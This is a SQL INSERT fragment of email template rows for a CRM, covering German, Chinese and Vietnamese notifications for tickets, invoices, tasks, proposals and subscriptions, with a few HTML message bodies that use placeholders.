(725, 'tasks', 'task-assigned', 'german', 'New Task Assigned (Sent to Staff) [german]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(726, 'tasks', 'task-added-as-follower', 'german', 'Staff Member Added as Follower on Task (Sent to Staff) [german]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(727, 'tasks', 'task-commented', 'german', 'New Comment on Task (Sent to Staff) [german]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(728, 'tasks', 'task-added-attachment', 'german', 'New Attachment(s) on Task (Sent to Staff) [german]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(729, 'estimate', 'estimate-declined-to-staff', 'german', 'Estimate Declined (Sent to Staff) [german]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(730, 'estimate', 'estimate-accepted-to-staff', 'german', 'Estimate Accepted (Sent to Staff) [german]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(731, 'proposals', 'proposal-client-accepted', 'german', 'Customer Action - Accepted (Sent to Staff) [german]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(732, 'proposals', 'proposal-send-to-customer', 'german', 'Send Proposal to Customer [german]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(733, 'proposals', 'proposal-client-declined', 'german', 'Customer Action - Declined (Sent to Staff) [german]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(734, 'proposals', 'proposal-client-thank-you', 'german', 'Thank You Email (Sent to Customer After Accept) [german]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(735, 'proposals', 'proposal-comment-to-client', 'german', 'New Comment  (Sent to Customer/Lead) [german]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(736, 'proposals', 'proposal-comment-to-admin', 'german', 'New Comment (Sent to Staff)  [german]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(737, 'estimate', 'estimate-thank-you-to-customer', 'german', 'Thank You Email (Sent to Customer After Accept) [german]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(738, 'tasks', 'task-deadline-notification', 'german', 'Task Deadline Reminder - Sent to Assigned Members [german]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(739, 'contract', 'send-contract', 'german', 'Send Contract to Customer [german]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(740, 'invoice', 'invoice-payment-recorded-to-staff', 'german', 'Invoice Payment Recorded (Sent to Staff) [german]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(741, 'ticket', 'auto-close-ticket', 'german', 'Auto Close Ticket [german]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(742, 'project', 'new-project-discussion-created-to-staff', 'german', 'New Project Discussion (Sent to Project Members) [german]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(743, 'project', 'new-project-discussion-created-to-customer', 'german', 'New Project Discussion (Sent to Customer Contacts) [german]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(744, 'project', 'new-project-file-uploaded-to-customer', 'german', 'New Project File(s) Uploaded (Sent to Customer Contacts) [german]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(745, 'project', 'new-project-file-uploaded-to-staff', 'german', 'New Project File(s) Uploaded (Sent to Project Members) [german]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(746, 'project', 'new-project-discussion-comment-to-customer', 'german', 'New Discussion Comment  (Sent to Customer Contacts) [german]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(747, 'project', 'new-project-discussion-comment-to-staff', 'german', 'New Discussion Comment (Sent to Project Members) [german]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(748, 'project', 'staff-added-as-project-member', 'german', 'Staff Added as Project Member [german]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(749, 'estimate', 'estimate-expiry-reminder', 'german', 'Estimate Expiration Reminder [german]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(750, 'proposals', 'proposal-expiry-reminder', 'german', 'Proposal Expiration Reminder [german]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(751, 'staff', 'new-staff-created', 'german', 'New Staff Created (Welcome Email) [german]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(752, 'client', 'contact-forgot-password', 'german', 'Forgot Password [german]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(753, 'client', 'contact-password-reseted', 'german', 'Password Reset - Confirmation [german]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(754, 'client', 'contact-set-password', 'german', 'Set New Password [german]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(755, 'staff', 'staff-forgot-password', 'german', 'Forgot Password [german]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(756, 'staff', 'staff-password-reseted', 'german', 'Password Reset - Confirmation [german]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(757, 'project', 'assigned-to-project', 'german', 'New Project Created (Sent to Customer Contacts) [german]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(758, 'tasks', 'task-added-attachment-to-contacts', 'german', 'New Attachment(s) on Task (Sent to Customer Contacts) [german]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(759, 'tasks', 'task-commented-to-contacts', 'german', 'New Comment on Task (Sent to Customer Contacts) [german]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(760, 'leads', 'new-lead-assigned', 'german', 'New Lead Assigned to Staff Member [german]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(761, 'client', 'client-statement', 'german', 'Statement - Account Summary [german]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(762, 'ticket', 'ticket-assigned-to-admin', 'german', 'New Ticket Assigned (Sent to Staff) [german]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(763, 'client', 'new-client-registered-to-admin', 'german', 'New Customer Registration (Sent to admins) [german]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(764, 'leads', 'new-web-to-lead-form-submitted', 'german', 'Web to lead form submitted - Sent to lead [german]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(765, 'staff', 'two-factor-authentication', 'german', 'Two Factor Authentication [german]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(766, 'project', 'project-finished-to-customer', 'german', 'Project Marked as Finished (Sent to Customer Contacts) [german]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(767, 'credit_note', 'credit-note-send-to-client', 'german', 'Send Credit Note To Email [german]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(768, 'tasks', 'task-status-change-to-staff', 'german', 'Task Status Changed (Sent to Staff) [german]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(769, 'tasks', 'task-status-change-to-contacts', 'german', 'Task Status Changed (Sent to Customer Contacts) [german]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(770, 'staff', 'reminder-email-staff', 'german', 'Staff Reminder Email [german]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(771, 'contract', 'contract-comment-to-client', 'german', 'New Comment  (Sent to Customer Contacts) [german]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(772, 'contract', 'contract-comment-to-admin', 'german', 'New Comment (Sent to Staff)  [german]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(773, 'subscriptions', 'send-subscription', 'german', 'Send Subscription to Customer [german]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(774, 'subscriptions', 'subscription-payment-failed', 'german', 'Subscription Payment Failed [german]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(775, 'subscriptions', 'subscription-canceled', 'german', 'Subscription Canceled (Sent to customer primary contact) [german]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(776, 'subscriptions', 'subscription-payment-succeeded', 'german', 'Subscription Payment Succeeded (Sent to customer primary contact) [german]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(777, 'contract', 'contract-expiration-to-staff', 'german', 'Contract Expiration Reminder (Sent to Staff) [german]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(778, 'gdpr', 'gdpr-removal-request', 'german', 'Removal Request From Contact (Sent to administrators) [german]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(779, 'gdpr', 'gdpr-removal-request-lead', 'german', 'Removal Request From Lead (Sent to administrators) [german]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(780, 'client', 'client-registration-confirmed', 'german', 'Customer Registration Confirmed [german]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(781, 'contract', 'contract-signed-to-staff', 'german', 'Contract Signed (Sent to Staff) [german]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(782, 'subscriptions', 'customer-subscribed-to-staff', 'german', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [german]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(783, 'client', 'contact-verification-email', 'german', 'Email Verification (Sent to Contact After Registration) [german]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(784, 'client', 'new-customer-profile-file-uploaded-to-staff', 'german', 'New Customer Profile File(s) Uploaded (Sent to Staff) [german]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(785, 'staff', 'event-notification-to-staff', 'german', 'Event Notification (Calendar) [german]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(786, 'subscriptions', 'subscription-payment-requires-action', 'german', 'Credit Card Authorization Required - SCA [german]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(787, 'invoice', 'invoice-due-notice', 'german', 'Invoice Due Notice [german]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(788, 'estimate_request', 'estimate-request-submitted-to-staff', 'german', 'Estimate Request Submitted (Sent to Staff) [german]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(789, 'estimate_request', 'estimate-request-assigned', 'german', 'Estimate Request Assigned (Sent to Staff) [german]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(790, 'estimate_request', 'estimate-request-received-to-user', 'german', 'Estimate Request Received (Sent to User) [german]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(791, 'client', 'new-client-created', 'chinese', 'New Contact Added/Registered (Welcome Email) [chinese]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(792, 'invoice', 'invoice-send-to-client', 'chinese', 'Send Invoice to Customer [chinese]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(793, 'ticket', 'new-ticket-opened-admin', 'chinese', 'New Ticket Opened (Opened by Staff, Sent to Customer) [chinese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(794, 'ticket', 'ticket-reply', 'chinese', 'Ticket Reply (Sent to Customer) [chinese]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(795, 'ticket', 'ticket-autoresponse', 'chinese', 'New Ticket Opened - Autoresponse [chinese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(796, 'invoice', 'invoice-payment-recorded', 'chinese', 'Invoice Payment Recorded (Sent to Customer) [chinese]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(797, 'invoice', 'invoice-overdue-notice', 'chinese', 'Invoice Overdue Notice [chinese]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(798, 'invoice', 'invoice-already-send', 'chinese', 'Invoice Already Sent to Customer [chinese]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(799, 'ticket', 'new-ticket-created-staff', 'chinese', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [chinese]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(800, 'estimate', 'estimate-send-to-client', 'chinese', 'Send Estimate to Customer [chinese]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(801, 'ticket', 'ticket-reply-to-admin', 'chinese', 'Ticket Reply (Sent to Staff) [chinese]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(802, 'estimate', 'estimate-already-send', 'chinese', 'Estimate Already Sent to Customer [chinese]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(803, 'contract', 'contract-expiration', 'chinese', 'Contract Expiration Reminder (Sent to Customer Contacts) [chinese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(804, 'tasks', 'task-assigned', 'chinese', 'New Task Assigned (Sent to Staff) [chinese]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(805, 'tasks', 'task-added-as-follower', 'chinese', 'Staff Member Added as Follower on Task (Sent to Staff) [chinese]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(806, 'tasks', 'task-commented', 'chinese', 'New Comment on Task (Sent to Staff) [chinese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(807, 'tasks', 'task-added-attachment', 'chinese', 'New Attachment(s) on Task (Sent to Staff) [chinese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(808, 'estimate', 'estimate-declined-to-staff', 'chinese', 'Estimate Declined (Sent to Staff) [chinese]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(809, 'estimate', 'estimate-accepted-to-staff', 'chinese', 'Estimate Accepted (Sent to Staff) [chinese]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(810, 'proposals', 'proposal-client-accepted', 'chinese', 'Customer Action - Accepted (Sent to Staff) [chinese]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(811, 'proposals', 'proposal-send-to-customer', 'chinese', 'Send Proposal to Customer [chinese]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(812, 'proposals', 'proposal-client-declined', 'chinese', 'Customer Action - Declined (Sent to Staff) [chinese]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(813, 'proposals', 'proposal-client-thank-you', 'chinese', 'Thank You Email (Sent to Customer After Accept) [chinese]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(814, 'proposals', 'proposal-comment-to-client', 'chinese', 'New Comment  (Sent to Customer/Lead) [chinese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(815, 'proposals', 'proposal-comment-to-admin', 'chinese', 'New Comment (Sent to Staff)  [chinese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(816, 'estimate', 'estimate-thank-you-to-customer', 'chinese', 'Thank You Email (Sent to Customer After Accept) [chinese]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(817, 'tasks', 'task-deadline-notification', 'chinese', 'Task Deadline Reminder - Sent to Assigned Members [chinese]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(818, 'contract', 'send-contract', 'chinese', 'Send Contract to Customer [chinese]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(819, 'invoice', 'invoice-payment-recorded-to-staff', 'chinese', 'Invoice Payment Recorded (Sent to Staff) [chinese]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(820, 'ticket', 'auto-close-ticket', 'chinese', 'Auto Close Ticket [chinese]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(821, 'project', 'new-project-discussion-created-to-staff', 'chinese', 'New Project Discussion (Sent to Project Members) [chinese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(822, 'project', 'new-project-discussion-created-to-customer', 'chinese', 'New Project Discussion (Sent to Customer Contacts) [chinese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(823, 'project', 'new-project-file-uploaded-to-customer', 'chinese', 'New Project File(s) Uploaded (Sent to Customer Contacts) [chinese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(824, 'project', 'new-project-file-uploaded-to-staff', 'chinese', 'New Project File(s) Uploaded (Sent to Project Members) [chinese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(825, 'project', 'new-project-discussion-comment-to-customer', 'chinese', 'New Discussion Comment  (Sent to Customer Contacts) [chinese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(826, 'project', 'new-project-discussion-comment-to-staff', 'chinese', 'New Discussion Comment (Sent to Project Members) [chinese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(827, 'project', 'staff-added-as-project-member', 'chinese', 'Staff Added as Project Member [chinese]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(828, 'estimate', 'estimate-expiry-reminder', 'chinese', 'Estimate Expiration Reminder [chinese]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(829, 'proposals', 'proposal-expiry-reminder', 'chinese', 'Proposal Expiration Reminder [chinese]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(830, 'staff', 'new-staff-created', 'chinese', 'New Staff Created (Welcome Email) [chinese]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(831, 'client', 'contact-forgot-password', 'chinese', 'Forgot Password [chinese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(832, 'client', 'contact-password-reseted', 'chinese', 'Password Reset - Confirmation [chinese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(833, 'client', 'contact-set-password', 'chinese', 'Set New Password [chinese]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(834, 'staff', 'staff-forgot-password', 'chinese', 'Forgot Password [chinese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(835, 'staff', 'staff-password-reseted', 'chinese', 'Password Reset - Confirmation [chinese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(836, 'project', 'assigned-to-project', 'chinese', 'New Project Created (Sent to Customer Contacts) [chinese]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(837, 'tasks', 'task-added-attachment-to-contacts', 'chinese', 'New Attachment(s) on Task (Sent to Customer Contacts) [chinese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(838, 'tasks', 'task-commented-to-contacts', 'chinese', 'New Comment on Task (Sent to Customer Contacts) [chinese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(839, 'leads', 'new-lead-assigned', 'chinese', 'New Lead Assigned to Staff Member [chinese]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(840, 'client', 'client-statement', 'chinese', 'Statement - Account Summary [chinese]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(841, 'ticket', 'ticket-assigned-to-admin', 'chinese', 'New Ticket Assigned (Sent to Staff) [chinese]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(842, 'client', 'new-client-registered-to-admin', 'chinese', 'New Customer Registration (Sent to admins) [chinese]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(843, 'leads', 'new-web-to-lead-form-submitted', 'chinese', 'Web to lead form submitted - Sent to lead [chinese]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(844, 'staff', 'two-factor-authentication', 'chinese', 'Two Factor Authentication [chinese]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(845, 'project', 'project-finished-to-customer', 'chinese', 'Project Marked as Finished (Sent to Customer Contacts) [chinese]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(846, 'credit_note', 'credit-note-send-to-client', 'chinese', 'Send Credit Note To Email [chinese]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(847, 'tasks', 'task-status-change-to-staff', 'chinese', 'Task Status Changed (Sent to Staff) [chinese]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(848, 'tasks', 'task-status-change-to-contacts', 'chinese', 'Task Status Changed (Sent to Customer Contacts) [chinese]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(849, 'staff', 'reminder-email-staff', 'chinese', 'Staff Reminder Email [chinese]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(850, 'contract', 'contract-comment-to-client', 'chinese', 'New Comment  (Sent to Customer Contacts) [chinese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(851, 'contract', 'contract-comment-to-admin', 'chinese', 'New Comment (Sent to Staff)  [chinese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(852, 'subscriptions', 'send-subscription', 'chinese', 'Send Subscription to Customer [chinese]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(853, 'subscriptions', 'subscription-payment-failed', 'chinese', 'Subscription Payment Failed [chinese]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(854, 'subscriptions', 'subscription-canceled', 'chinese', 'Subscription Canceled (Sent to customer primary contact) [chinese]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(855, 'subscriptions', 'subscription-payment-succeeded', 'chinese', 'Subscription Payment Succeeded (Sent to customer primary contact) [chinese]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(856, 'contract', 'contract-expiration-to-staff', 'chinese', 'Contract Expiration Reminder (Sent to Staff) [chinese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(857, 'gdpr', 'gdpr-removal-request', 'chinese', 'Removal Request From Contact (Sent to administrators) [chinese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(858, 'gdpr', 'gdpr-removal-request-lead', 'chinese', 'Removal Request From Lead (Sent to administrators) [chinese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(859, 'client', 'client-registration-confirmed', 'chinese', 'Customer Registration Confirmed [chinese]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(860, 'contract', 'contract-signed-to-staff', 'chinese', 'Contract Signed (Sent to Staff) [chinese]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(861, 'subscriptions', 'customer-subscribed-to-staff', 'chinese', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [chinese]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(862, 'client', 'contact-verification-email', 'chinese', 'Email Verification (Sent to Contact After Registration) [chinese]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(863, 'client', 'new-customer-profile-file-uploaded-to-staff', 'chinese', 'New Customer Profile File(s) Uploaded (Sent to Staff) [chinese]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(864, 'staff', 'event-notification-to-staff', 'chinese', 'Event Notification (Calendar) [chinese]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(865, 'subscriptions', 'subscription-payment-requires-action', 'chinese', 'Credit Card Authorization Required - SCA [chinese]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(866, 'invoice', 'invoice-due-notice', 'chinese', 'Invoice Due Notice [chinese]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(867, 'estimate_request', 'estimate-request-submitted-to-staff', 'chinese', 'Estimate Request Submitted (Sent to Staff) [chinese]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(868, 'estimate_request', 'estimate-request-assigned', 'chinese', 'Estimate Request Assigned (Sent to Staff) [chinese]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(869, 'estimate_request', 'estimate-request-received-to-user', 'chinese', 'Estimate Request Received (Sent to User) [chinese]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(870, 'client', 'new-client-created', 'vietnamese', 'New Contact Added/Registered (Welcome Email) [vietnamese]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(871, 'invoice', 'invoice-send-to-client', 'vietnamese', 'Send Invoice to Customer [vietnamese]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(872, 'ticket', 'new-ticket-opened-admin', 'vietnamese', 'New Ticket Opened (Opened by Staff, Sent to Customer) [vietnamese]', 'Yêu cầu Hỗ Trợ mới gởi đến', '<span style=\"font-size: 12pt;\">Hi {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">New support ticket has been opened.</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Subject:</strong> {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Department:</strong> {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Priority:</strong> {ticket_priority}<br /></span><br /><span style=\"font-size: 12pt;\"><strong>Ticket message:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the ticket on the following link: <a href=\"{ticket_public_url}\">#{ticket_id}</a><br /><br />Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(873, 'ticket', 'ticket-reply', 'vietnamese', 'Ticket Reply (Sent to Customer) [vietnamese]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(874, 'ticket', 'ticket-autoresponse', 'vietnamese', 'New Ticket Opened - Autoresponse [vietnamese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(875, 'invoice', 'invoice-payment-recorded', 'vietnamese', 'Invoice Payment Recorded (Sent to Customer) [vietnamese]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', '', 0, 1, 0),
(876, 'invoice', 'invoice-overdue-notice', 'vietnamese', 'Invoice Overdue Notice [vietnamese]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(877, 'invoice', 'invoice-already-send', 'vietnamese', 'Invoice Already Sent to Customer [vietnamese]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(878, 'ticket', 'new-ticket-created-staff', 'vietnamese', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [vietnamese]', 'New Ticket Created', 'Một y&ecirc;u cầu hỗ trợ mới đ&atilde; được tạo ra.<br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n</strong>: {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n</strong>: {ticket_priority}<br /></span><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn hỗ trợ:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the ticket on the following link: <a href=\"{ticket_url}\">#{ticket_id}</a></span><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
